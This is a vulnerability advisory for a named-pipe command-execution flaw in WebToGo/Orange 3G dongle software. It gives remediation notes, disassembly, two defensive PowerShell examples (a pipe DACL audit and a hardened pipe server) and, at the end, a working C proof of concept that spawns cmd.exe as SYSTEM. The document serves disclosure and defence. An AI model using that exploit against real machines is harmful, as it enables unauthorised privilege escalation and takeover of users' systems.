Product: WebToGo 3G Dongles
Type: WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution
A vulnerability exists within the OrangeMobileBroadband_Service which allows a low-privileged user to perform arbitrary command execution in the context of SYSTEM by communicating with an unprotected named pipe.
This vulnerability can be used to perform local privilege escalation on devices which have the software installed.
The vulnerability exists due to lack of authentication and authorisation being performed on connections to the named pipe.
As an interim workaround the OrangeMobileBroadband_Service could be stopped whilst the 3G connectivity is not in use. However, if 3G is required then this service must be running, so full remediation will require a patch from the vendor.
A software upgrade message will be promoted; however, it does not seem possible to force a manual upgrade. It may therefore be necessary to apply the interim workaround until a patch update is promoted.
A named pipe is exposed from the OrangeMobileBroadband_Service which does not have any security restrictions applied. The service executes by default under the context of the SYSTEM user. Therefore a low-privileged attacker can communicate with the named pipe to invoke functionality exposed by the service.
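The check a defender would want for this class of issue is a DACL audit of the named pipes served on a host. The following script is an added example, not part of the advisory or of the vendor's software. It opens each pipe read-only just long enough to read its security descriptor via PipeStream.GetAccessControl (available in Windows PowerShell 5.1 on the .NET Framework, which is assumed here) and reports Allow entries that grant WriteData to broad groups; the list of groups treated as "broad" and the 200 ms connect timeout are assumptions chosen for illustration.

```powershell
# Added example (not the advisory's or the vendor's code): report named pipes whose
# DACL lets broad groups write to them. Assumes Windows PowerShell 5.1 (.NET Framework).
Add-Type -AssemblyName System.Core

# Groups whose write access to a pipe served by a SYSTEM process deserves review (assumption).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\ANONYMOUS LOGON', 'NT AUTHORITY\INTERACTIVE')

function Get-PipeDacl {
    param([Parameter(Mandatory)][string]$PipeName, [int]$TimeoutMs = 200)
    # Open the pipe read-only; GENERIC_READ carries READ_CONTROL, which is all we need.
    $client = New-Object System.IO.Pipes.NamedPipeClientStream('.', $PipeName,
        [System.IO.Pipes.PipeDirection]::In)
    try {
        $client.Connect($TimeoutMs)
        $acl = $client.GetAccessControl()
        return $acl.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])
    } finally {
        $client.Dispose()
    }
}

function Find-WritablePipes {
    # Default: every pipe currently listed under \\.\pipe\ on this host.
    param([string[]]$PipeNames = ([System.IO.Directory]::GetFiles('\\.\pipe\') |
                                  ForEach-Object { $_ -replace '^\\\\\.\\pipe\\', '' }))
    foreach ($name in $PipeNames) {
        # Busy single-instance pipes, pipes that vanish mid-scan and access-denied are skipped.
        try { $rules = Get-PipeDacl -PipeName $name } catch { continue }
        foreach ($rule in $rules) {
            $isAllow  = $rule.AccessControlType -eq [System.Security.AccessControl.AccessControlType]::Allow
            # FullControl includes the WriteData bit, so it is caught by the same test.
            $canWrite = ($rule.PipeAccessRights -band [System.IO.Pipes.PipeAccessRights]::WriteData) -ne 0
            if ($isAllow -and $canWrite -and ($BroadPrincipals -contains $rule.IdentityReference.Value)) {
                [pscustomobject]@{ Pipe = $name; Principal = $rule.IdentityReference.Value; Rights = $rule.PipeAccessRights }
            }
        }
    }
}

# Audit the one pipe named in this advisory, or the whole host.
Find-WritablePipes -PipeNames 'OrangeMobileBroadband_Service' | Format-Table -AutoSize
Find-WritablePipes | Format-Table -AutoSize
```

Because reading the descriptor requires a handle, each probed pipe's server sees a short connect/disconnect; run it from an elevated session on hosts you administer, and expect pipes that already have their single instance busy to time out and be skipped. A SYSTEM service pipe that shows up with Everyone or Authenticated Users holding WriteData is the condition this advisory describes.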
The following named pipe is exposed from the OrangeMobileBroadband_Service: \\.\pipe\OrangeMobileBroadband_Service
The following additional functionality was found to be exposed by the service and could be abused by an attacker:
The following disassembly demonstrates the service's ability to spawn an arbitrary executable using the ShellExecuteExW function:
.text:004079FE cmp ax, 30h
.text:00407A02 jnz loc_407BF2
.text:00407A08 push offset aParam40RunSpec ; "Param 40 - Run specified
.text:00407A0D call sub_40BB00
.text:00407AB4 lea eax, [esp+8E80h+Dest]
.text:00407ABB mov [esp+8E80h+pExecInfo.lpFile], eax
.text:00407AC2 add esp, 0Ch
.text:00407AC5 mov [esp+8E74h+pExecInfo.cbSize], 3Ch
.text:00407AD0 mov [esp+8E74h+pExecInfo.fMask], 40h
.text:00407ADB mov [esp+8E74h+pExecInfo.hwnd], edi
.text:00407AE2 mov [esp+8E74h+pExecInfo.lpVerb], edi
.text:00407AE9 mov ecx, offset Dependencies
.text:00407AEE lea eax, [esp+8E74h+Data]
.text:00407B76 lea edx, [esp+8E74h+pExecInfo]
.text:00407B7D mov esi, 1
.text:00407B82 push edx ; pExecInfo
.text:00407B83 mov [esp+8E78h+pExecInfo.lpDirectory], edi
.text:00407B8A mov [esp+8E78h+pExecInfo.nShow], esi
.text:00407B91 mov [esp+8E78h+pExecInfo.hInstApp], edi
.text:00407B98 call ds:ShellExecuteExW
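The listing above shows the root design flaw on the server side: the path placed in pExecInfo.lpFile comes straight from the client message, and nothing checks who sent it. The following is an added example (not the advisory's or the vendor's code) of how a pipe server on Windows can close both gaps: an explicit DACL restricting the pipe to SYSTEM and local Administrators (with NETWORK denied, so a remote client holding a known local account still cannot reach it), and a fixed command table so the client selects an action by id and never names an executable. The pipe name "ExampleHardenedService", the "40|..." request layout modelled on the advisory's message, and the use of Windows PowerShell 5.1 (.NET Framework, where the NamedPipeServerStream overload that takes a PipeSecurity exists) are assumptions for illustration.

```powershell
# Added example (not the advisory's or the vendor's code): a named-pipe server with an
# explicit DACL and an allow-list of actions. Assumes Windows PowerShell 5.1 (.NET Framework).
Add-Type -AssemblyName System.Core

function New-RestrictedPipeSecurity {
    # Only SYSTEM and BUILTIN\Administrators may open the pipe; NETWORK is denied so that
    # a remote SMB client cannot reach it even with valid local credentials.
    $sec  = New-Object System.IO.Pipes.PipeSecurity
    $full = [System.IO.Pipes.PipeAccessRights]::FullControl
    foreach ($wk in 'LocalSystemSid', 'BuiltinAdministratorsSid') {
        $sidType = [Enum]::Parse([System.Security.Principal.WellKnownSidType], $wk)
        $sid = New-Object System.Security.Principal.SecurityIdentifier($sidType, $null)
        $sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule($sid, $full, 'Allow')))
    }
    $net = New-Object System.Security.Principal.SecurityIdentifier(
        [System.Security.Principal.WellKnownSidType]::NetworkSid, $null)
    $sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule($net, $full, 'Deny')))
    return $sec
}

# The service owns the mapping from command id to action. A real service would start
# its own fixed binary here; the scriptblock body is a placeholder (assumption).
$Actions = @{
    '40' = { 'reconnect-modem (fixed action owned by the service)' }
}

function Invoke-PipeRequest {
    param([string]$Request, [hashtable]$Actions)
    if (-not $Request) { return 'rejected: empty request' }
    $fields = $Request -split '\|'
    $cmd = $fields[0]
    if (-not $Actions.ContainsKey($cmd)) { return "rejected: unknown command '$cmd'" }
    # Trailing fields are never passed through to a shell or used as a path.
    return 'ok: ' + (& $Actions[$cmd])
}

function Start-HardenedPipeServer {
    param([string]$PipeName = 'ExampleHardenedService')
    $server = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,
        [System.IO.Pipes.PipeDirection]::InOut, 1,
        [System.IO.Pipes.PipeTransmissionMode]::Message,
        [System.IO.Pipes.PipeOptions]::None, 4096, 4096, (New-RestrictedPipeSecurity))
    try {
        $server.WaitForConnection()
        # Defence in depth: the DACL already gates access; also record who connected.
        Write-Verbose ('client: ' + $server.GetImpersonationUserName()) -Verbose
        $reader = New-Object System.IO.StreamReader($server)
        $writer = New-Object System.IO.StreamWriter($server)
        $writer.AutoFlush = $true
        $writer.WriteLine((Invoke-PipeRequest -Request $reader.ReadLine() -Actions $Actions))
    } finally {
        $server.Dispose()
    }
}

# Serve one request, then exit. A request of "40|C:\anything.exe|x" is answered with the
# fixed action; "41|..." is rejected; a standard user cannot open the pipe at all.
Start-HardenedPipeServer
```

Two points of the design are worth stating. The DACL is the control that fixes the advisory's root cause (no authentication or authorisation on the pipe), and it must be set at creation time: a pipe created with default security cannot be retrofitted by the client-side checks that follow. The allow-list is the second layer: even a caller who legitimately reaches the pipe gets to choose among actions the service defined, which is what removes the ShellExecuteExW-on-client-path behaviour shown in the listing.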
The following code can be used to demonstrate a low-privileged user spawning a cmd.exe shell with SYSTEM privileges.
#include <windows.h>

int main(void)
{
    /* Message format accepted by the service: command "40" (\x34\x30) followed by the
       executable path and its arguments, separated by '|' */
    wchar_t str[] = L"\x34\x30|C:\\Windows\\System32\\cmd.exe|args|args|args";
    DWORD dwWritten = 0;

    /* CreateFileW is used explicitly so the wide-string pipe name is correct without UNICODE defined */
    HANDLE hPipe = CreateFileW(L"\\\\.\\pipe\\OrangeMobileBroadband_Service",
                               GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE)
        return 1;

    WriteFile(hPipe, str, sizeof(str), &dwWritten, NULL);
    CloseHandle(hPipe);
    return 0;
}
In order to exploit this vulnerability an attacker requires a low-privileged account on the system. However, this issue can be exploited remotely through the named pipe if a low-privileged user account is known for the system.